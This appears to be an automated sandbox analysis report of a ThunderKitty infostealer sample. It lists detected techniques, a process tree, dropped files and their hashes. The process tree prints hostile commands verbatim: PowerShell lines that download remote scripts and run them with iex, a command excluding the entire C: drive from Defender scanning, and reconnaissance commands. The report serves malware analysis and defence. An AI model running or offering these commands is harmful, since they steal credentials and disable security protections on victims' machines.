Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 04:29

General

  • Target

    2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    80696c196c80f8fa96b9c16e96118079

  • SHA1

    8425d9e121cb1ee385dffd8a99cb1b88a12fa5d7

  • SHA256

    75ee504ebd01b58f96910432c8e6fe419b65b4a1b06fa58f5eedecfaf6ec956d

  • SHA512

    9cdc2bdec8acf1f56326dc9d0815ef396ebef261e03c7f1f44b883c2feab1e0fc78619c63ea329f6221761a48b6443ed482466db0eaea4aabadfb49855c9d31d

  • SSDEEP

    196608:d247x52HYfbI5+K/OIss/j9i+zpXts76p/zIf8ryQ5S:dxx5bW+KssLcMXtsezIfxA

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4668
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r31bxoj5\r31bxoj5.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3916
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F7.tmp" "c:\Users\Admin\AppData\Local\Temp\r31bxoj5\CSC6D7AEBB112D94328965B38C0F4A2B1B5.TMP"
          4⤵
            PID:1248
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3448
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2408
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:3164
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1592
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:4788
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1300
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:3168
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:2912
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4016
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:4624
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:4764
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:2328
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:3732
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:552
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:4780
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4284
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:876
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1664
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3232
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F8.tmp" "c:\Users\Admin\AppData\Local\Temp\zirjl2if\CSCC23C1E549D0B43A18CADEAD0D73629F1.TMP"
                          4⤵
                            PID:2600
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2396
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:4292
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4852
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:620
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:3624
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:2832
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3052
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x4b0 0x314
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4940

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          a43e653ffb5ab07940f4bdd9cc8fade4

                          SHA1

                          af43d04e3427f111b22dc891c5c7ee8a10ac4123

                          SHA256

                          c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

                          SHA512

                          62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          2eb78ef1a4d8309fd25384c426ddef05

                          SHA1

                          1751288f9add5f11f392e270bad249f04967c935

                          SHA256

                          b395f826a44c9b3c9c0520676537ccccba5f0f22706bf4179be2c6ef3943ef2b

                          SHA512

                          6da3dcb459ed18061ab15b323b45808a97d446d2c282e5010e89ab46544880b207a48c04349c33049231b386890b33ee5356ce148b64edf78297757b162a965c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          5e621802b71e3ece88354ee557e1ce88

                          SHA1

                          0a7bb0acee1ebc8281bd24ef0084076e03f93e1f

                          SHA256

                          80a94ab0d20a51881a420cf64826b30e621d94245304be8b35af5cac389bc587

                          SHA512

                          31038c0107f0111eef87385a6ec7ef56ec9833fd5ef85187e58c9b32917ba8b90fb7c1bb2efbf273f1ee3a03744ca61d3f4d6f25029b9715eca216be2d80ef01

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          fa683ba35bef5db77615e4281ba4c0fc

                          SHA1

                          e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

                          SHA256

                          d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

                          SHA512

                          a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

                        • C:\Users\Admin\AppData\Local\Temp\RES80F7.tmp

                          Filesize

                          1KB

                          MD5

                          e04486302823a9af8b72cfb005439c64

                          SHA1

                          54145145b328b0ea1e1a926ccc0f7f4cd4ee4d65

                          SHA256

                          66b0916dea3d486404956633094d30aef80d58ec7ba97c65681fce12f1e40ac4

                          SHA512

                          5119d9184f1a7c1e2c07764f2be920a6d2b0789ab4446961fcdf25cc91744e78d4e177f8dcf69e7ed9a7550e04c44c225210ec3f576d4b8b39b99cdd83ff0cec

                        • C:\Users\Admin\AppData\Local\Temp\RES80F8.tmp

                          Filesize

                          1KB

                          MD5

                          f1804f1d70dfa8b943d5677b66b036c5

                          SHA1

                          47881ac9e771fd4c14b828d3ec268d0e2e66f814

                          SHA256

                          16fab6c04d096463f0b2bdc8d046371fc126fa4ee063dccdf5227e07b4d11d2a

                          SHA512

                          2b46904084087262acdd7249d823d85f2043c56941a85c3578e1819a0b5c2624db1f7032513f5ae5d195c6479bca841e5a234456c1d366df76c458104aa43743

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          76KB

                          MD5

                          5152aa61c52129b200977f5eb537f2fd

                          SHA1

                          1a707829f2d0d4d56e88e1807a6fd44d4ede4c42

                          SHA256

                          20b045c5fce61b73cb24d5d157ed14e9873e99940dfda033fa8940d13ff2593e

                          SHA512

                          bb4bf2fa2243e40ffc1ed1f2e7b9cb785181fb539c3b45e378db7d5f067deea0dac3b40d0644b2f72d34c2652502998ba1af2575df8bd9ee65a3257d5e30a101

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          23KB

                          MD5

                          2a736a3498abc336b99cb0d848e5169a

                          SHA1

                          394e973bd2609bbf3a966d00134139e925d328a5

                          SHA256

                          aa72a886b2a774f057857340b1d2e6175332dfdd70dd380f3bc96968c2f9e6eb

                          SHA512

                          36c029007fd73e55e781d1a42ae08be99a979e8d9e1175d82a61655b98041e6858a5b17c7cd0962b7b2647ceecd99f965e406071af874b7eee51f170705dbabd

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0swn53uc.oak.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\r31bxoj5\r31bxoj5.dll

                          Filesize

                          4KB

                          MD5

                          aaa66e5f731ea071af9f0e9c017b099c

                          SHA1

                          023e0da455de1074a3c319f13d825ab40ad14bdf

                          SHA256

                          26e3c037438f34d4ac4afbb637fe86ab25bba44361323ef9bbce0cd98c7aa49f

                          SHA512

                          7006b255881d0db40c800348a8aa75dab328f442c06355522e134b86b0b0e8c666f49e0d09bff56b41f0f6c4db0ef655fd4c82c3ec28a10ab2659e83e0139d00

                        • C:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.dll

                          Filesize

                          4KB

                          MD5

                          1c7fe986b558e57ed4ec0fc8800a1c03

                          SHA1

                          0910b54ac024a0fb6671da12870387abd4fee829

                          SHA256

                          5f2e4836db1605a0f8334d7bb3bf63f3666e0cc38a011f31b7854caba05dce3a

                          SHA512

                          b319dba69ae8df84be20dc945d940bbeaae5dfc69e3fdbb1eea6bc0aa83e95b5bdc4b10f2f85692f15eab92a668222469674aaf06370643babc98a90e98bd268

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\r31bxoj5\CSC6D7AEBB112D94328965B38C0F4A2B1B5.TMP

                          Filesize

                          652B

                          MD5

                          3510296a0e3935cdca0f09dd203e3828

                          SHA1

                          34b6d8ab5284d1728a555e0be7a25e91dc42d9e6

                          SHA256

                          65945ec5013fec8e9607ee32ccf895324a651dbf128e99efc7f5b722a86dbc01

                          SHA512

                          1a8ae115841f925d68981439a56b62f5d5c3877a59bbe38177996ddebb16c5827e6e9629f56399a45d14f8b9042b01d85ebefcd9444fe0046ff607091cfa461b

                        • \??\c:\Users\Admin\AppData\Local\Temp\r31bxoj5\r31bxoj5.cmdline

                          Filesize

                          369B

                          MD5

                          f5d053bf43def0758780a55d9890296a

                          SHA1

                          7493a73d5573406c9e76b62c68dc0c80eb5c8d7b

                          SHA256

                          0804f637b81a11e05fc9211ee9710086dac33eace0c6ca981109cc03d34fe5a4

                          SHA512

                          35f7ad23460129938933183fbdd7cf77689b8de3cf75eb94de3a7ec32fa1efdf96aa82b1ed1ddf1e5507354ba896050e416937c02e0e039731cc5086109a8f6e

                        • \??\c:\Users\Admin\AppData\Local\Temp\zirjl2if\CSCC23C1E549D0B43A18CADEAD0D73629F1.TMP

                          Filesize

                          652B

                          MD5

                          0bd625ab06a6697db9aa7b9e36a11af7

                          SHA1

                          f64cb8eec3bdfd0bc77e1bf5deaea250e1b519ae

                          SHA256

                          e37254baa83c33dea0e8a7d0dfcdcdb875bd1cb29187f372a35fbf1f6f02a213

                          SHA512

                          36966a755935fa2378bc7a4a1914d3eba5f5eb2c7ae2502aead48fdbfea9ef8a34f0f609ea2a94468cea9738ff399372fbc777f0f1db1fbd777437394e587bc0

                        • \??\c:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.cmdline

                          Filesize

                          369B

                          MD5

                          6f34f38f0b99679e57bc0d0dd3fd3776

                          SHA1

                          3dbe5d3ad9370dde804bd7c1ae2f74f970b20309

                          SHA256

                          d3e55e57a77ed38185ae80e0e6f4f7f99ce707c9fbcdf5a846f1e387246c2bfa

                          SHA512

                          b9e2a03735e43818ce7173c29b7708b0d69a4f018114b93afbe715dbb492968fce79db6fe39d705b57fbbb4768d9f679a58fbe6e6808bb5e9dc9c176ce4dbb95

                        • memory/1664-1-0x00007FFA09740000-0x00007FFA0A201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/1664-70-0x0000025166B20000-0x0000025166B28000-memory.dmp

                          Filesize

                          32KB

                        • memory/1664-0-0x00007FFA09743000-0x00007FFA09745000-memory.dmp

                          Filesize

                          8KB

                        • memory/1664-87-0x000002517EE30000-0x000002517F04C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/1664-88-0x00007FFA09740000-0x00007FFA0A201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/1664-11-0x000002517F150000-0x000002517F172000-memory.dmp

                          Filesize

                          136KB

                        • memory/1664-22-0x00007FFA09740000-0x00007FFA0A201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2396-46-0x000001E5AFC20000-0x000001E5AFE3C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/4668-94-0x00000263242A0000-0x00000263242CA000-memory.dmp

                          Filesize

                          168KB

                        • memory/4668-95-0x00000263242A0000-0x00000263242C4000-memory.dmp

                          Filesize

                          144KB

                        • memory/4668-73-0x000002630B670000-0x000002630B678000-memory.dmp

                          Filesize

                          32KB

                        • memory/4668-127-0x0000026324290000-0x00000263242A2000-memory.dmp

                          Filesize

                          72KB

                        • memory/4668-128-0x0000026324280000-0x000002632428A000-memory.dmp

                          Filesize

                          40KB

                        • memory/4668-137-0x0000026323800000-0x0000026323A1C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/4668-81-0x0000026324630000-0x0000026324DD6000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/4852-93-0x000001A94D370000-0x000001A94D58C000-memory.dmp

                          Filesize

                          2.1MB